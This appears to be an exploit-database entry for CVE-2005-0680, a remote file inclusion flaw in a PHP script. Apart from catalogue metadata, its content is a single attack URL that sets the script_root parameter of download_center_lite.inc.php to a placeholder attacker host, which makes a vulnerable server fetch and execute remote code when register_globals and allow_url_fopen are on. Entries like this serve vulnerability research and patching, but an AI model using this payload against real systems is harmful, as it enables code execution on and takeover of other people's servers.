Author: Filip Groszynski type: webapps platform: php port: date_added: 2005-03-09 date_updated: verified: 1 codes: OSVDB-14568;CVE-2005-0680 tags: aliases: screenshot_url: application_url:
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker_box]/
# milw0rm.com [2005-03-10]